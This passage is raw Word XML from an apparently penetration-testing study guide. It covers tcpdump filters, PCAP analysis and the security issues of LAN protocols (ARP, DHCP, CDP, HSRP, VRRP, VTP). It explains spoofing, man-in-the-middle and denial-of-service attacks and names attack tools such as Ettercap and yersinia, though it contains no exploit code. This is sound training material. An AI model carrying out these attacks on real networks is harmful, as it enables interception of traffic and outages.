        <w:t xml:space="preserve"> net 192.168.0.0/24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dst</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> net 192.168.0.0/24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port</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 53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10.1.1.1 and port 80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10.1.1.1 and not (port 80 or port 25)</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port</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> not 53 and not arp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tcp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> portrange 1501-1549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ip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="006E38B0" w:rsidP="006E38B0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>D2b - Analysis of network traffic stored in PCAP files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E38B0" w:rsidRPr="00A12C9C" w:rsidRDefault="0039713D" w:rsidP="006E38B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Load into </w:t>
      </w:r>
      <w:r w:rsidR="00A12C9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00623A04" w:rsidRPr="00A12C9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ireshark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00623A04" w:rsidRPr="00A12C9C" w:rsidRDefault="0039713D" w:rsidP="006E38B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A12C9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRPr="00A12C9C" w:rsidRDefault="00623A04" w:rsidP="00A12C9C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A12C9C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A12C9C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0039713D" w:rsidRPr="00A12C9C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–r &lt;capturefile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>D3 - Networking Protocols</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>D3a - Security issues relating to the networking protocols:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>ARP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0020405F" w:rsidRDefault="00623A04" w:rsidP="00623A04">
      <w:r w:rsidRPr="00807F55">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARP Spoofing</w:t>
      </w:r>
      <w:r w:rsidR="007D4126" w:rsidRPr="00807F55">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> enables sniffing traffic on a switch LAN and performing man-in-the-middle attacks. ARP can be abused by sending gratuitous ARP messages saying “I am IP”. This can be done both ways to fool other hosts into sending the traffic via your host rather than the real target. You then forward the traffic onto its real destination and do the same attack on the return traffic.</w:t>
      </w:r>
      <w:r w:rsidR="0020405F" w:rsidRPr="0020405F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0020405F" w:rsidRPr="0020405F" w:rsidRDefault="0020405F" w:rsidP="00623A04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020405F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Gratuitous ARP could mean either gratuitous ARP request or gratuitous ARP reply. Gratuitous in this case means a request/reply that is not normally needed according to the ARP specification (RFC 826) but could be used in some cases. A gratuitous ARP request is an AddressResolutionProtocol request packet where the source and destination IP are both set to the IP of the machine issuing the packet and the destination MAC is the broadcast address ff:ff:ff:ff:ff:ff. Ordinarily, no reply packet will occur. A gratuitous ARP reply is a reply to which no request has been made.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4126" w:rsidRPr="00807F55" w:rsidRDefault="007D4126" w:rsidP="00623A04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00807F55" w:rsidRPr="00807F55" w:rsidRDefault="00807F55" w:rsidP="00623A04">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807F55">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00623A04" w:rsidRPr="00335D68" w:rsidRDefault="00623A04" w:rsidP="00335D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335D68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cain</w:t>
      </w:r>
      <w:r w:rsidR="00807F55" w:rsidRPr="00335D68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D51361" w:rsidRPr="00335D68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00807F55" w:rsidRPr="00335D68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(windows)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00623A04" w:rsidRPr="00335D68" w:rsidRDefault="00623A04" w:rsidP="00335D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335D68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ettercap</w:t>
      </w:r>
      <w:r w:rsidR="00D51361" w:rsidRPr="00335D68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D51361" w:rsidRPr="00335D68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00335D68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00807F55" w:rsidRPr="00335D68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(linux)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DHCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00623A04" w:rsidRPr="00B90047" w:rsidRDefault="00623A04" w:rsidP="00623A04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Rogue DHCP servers</w:t>
      </w:r>
      <w:r w:rsidR="00B90047" w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> could be setup on a network causing denial or service. An attacker could set up a DHCP service and if network client received DHCP responses from this before the real DHCP server then the attacker controls what IP addresses are used. An attacker could allocate server IP addresses to DHCP clients causing IP address duplications and potential denial of service to other hosts and services on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90047" w:rsidRPr="00B90047" w:rsidRDefault="00B90047" w:rsidP="00623A04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B90047" w:rsidRPr="00B90047" w:rsidRDefault="00B90047" w:rsidP="00623A04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally as DHCP is a broadcast protocol anyone with the ability to sniff network traffic will see these communications.  Observing DHCP request and relies will identify targets and can help identify devices types </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">based on the MAC OUI (organisation unique identifier). DHCP responses will also contain the gateway IP, DNS server IPs, and potentially other key network services details (e.g. WINS). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>CDP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00807F55" w:rsidRPr="00363CBC" w:rsidRDefault="00807F55" w:rsidP="00363CBC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00363CBC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Cisco Discovery Protocol (CDP) is a proprietary Data Link Layer network protocol developed by Cisco Systems that is implemented in most Cisco networking equipment and is used to share information about other directly connected Cisco equipment, such as the operating system version and IP address. CDP can also be used for On-Demand Routing, which is a method of including routing information in CDP announcements so that dynamic routing protocols do not need to be used in simple networks.</w:t>
      </w:r>
      <w:r w:rsidR="00363CBC" w:rsidRPr="00363CBC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CDP is not routed and is only accessible to the local segment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00807F55" w:rsidRPr="00363CBC" w:rsidRDefault="00807F55" w:rsidP="00807F55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00807F55" w:rsidRDefault="00D51361" w:rsidP="00623A04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Information disclosure from</w:t>
      </w:r>
      <w:r w:rsidR="00623A04" w:rsidRPr="00363CBC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CDP</w:t>
      </w:r>
      <w:r w:rsidR="00807F55" w:rsidRPr="00363CBC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">device &amp; </w:t>
      </w:r>
      <w:r w:rsidR="00807F55" w:rsidRPr="00363CBC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OS version, IP address and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VLAN ID</w:t>
      </w:r>
      <w:r w:rsidR="00807F55" w:rsidRPr="00363CBC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> by sniffing network traffic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00152C43" w:rsidRDefault="00152C43" w:rsidP="00623A04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00152C43" w:rsidRDefault="00152C43" w:rsidP="00623A04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>It is also possible to DoS routers via CDP flooding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRDefault="00335D68" w:rsidP="00623A04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="00335D68" w:rsidRDefault="00335D68" w:rsidP="00623A04">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335D68">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attack Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="0082714B" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0082714B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>yersinia</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>HSRP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="00335D68" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335D68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hot Standby Router Protocol (HSRP) is a Cisco proprietary redundancy protocol for establishing a fault-tolerant default gateway.  The protocol establishes a framework between network routers in order to achieve default gateway failover if the primary gateway should become inaccessible. HSRP sends its hello messages to the multicast address 224.0.0.2 (all routers) using UDP port 1985, to other HSRP-enabled routers, defining priority between the routers. The primary router with the highest configured priority will act as a virtual router with a pre-defined gateway IP and will respond to the ARP request from machines connected to the LAN with the mac address 0000.0c07.acXX where XX is the group ID in hex. If the primary router should fail, the router with the next-highest priority would take over the gateway IP and answer ARP requests with the same mac address, thus achieving transparent default gateway fail-over.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="00335D68" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="00335D68" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335D68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HSRP traffic is multicast so can be captured by sniffing the network. The password is in clear text, often as the default ‘cisco’ so can easily be captured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="00335D68" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335D68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>By faking HSRP messages an attacker can become an ACTIVE element and then all traffic is routed via them. This allows man-in-the-middle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="00335D68" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335D68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>By faking HSRP messages an attacker can become an ACTIVE element and then all traffic is routed via them. This allows man-in-the-middle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE56C0" w:rsidRDefault="00FE56C0" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE56C0" w:rsidRPr="00335D68" w:rsidRDefault="00FE56C0" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="0082714B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attacke</w:t>
      </w:r>
      <w:r w:rsidRPr="00335D68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">r can </w:t>
      </w:r>
      <w:r w:rsidR="00581D61">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidRPr="00335D68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>an ACTIVE element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an incorrect IP to cause a network DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00335D68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="00335D68" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="00335D68" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335D68">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attack Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="0082714B" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0082714B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>yersinia</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>VRRP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="00FE56C0" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE56C0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Virtual Router Redundancy Protocol (VRRP) is a standards-based alternative to HSRP defined in IETF standard RFC 3768. The two technologies are similar in concept, but not compatible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335D68" w:rsidRPr="00FE56C0" w:rsidRDefault="00335D68" w:rsidP="00335D68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0099667B" w:rsidRPr="00FE56C0" w:rsidRDefault="00335D68" w:rsidP="0099667B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE56C0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Same attacks apply to VRRP as to HSRP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>VTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE56C0" w:rsidRPr="00FE56C0" w:rsidRDefault="00FE56C0" w:rsidP="0099667B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE56C0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VLAN Trunking Protocol (VTP) is a Cisco proprietary Layer 2 messaging protocol that manages the addition, deletion, and renaming of Virtual Local Area Networks (VLAN) on a network-wide basis. Cisco's VLAN Trunk Protocol reduces administration in a switched network. When a new VLAN is configured on one VTP server, the VLAN is distributed through all switches in the domain. This reduces the need to configure the same VLAN everywhere. To do this, VTP carries VLAN information to all the switches in a VTP domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE56C0" w:rsidRDefault="00FE56C0" w:rsidP="0099667B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
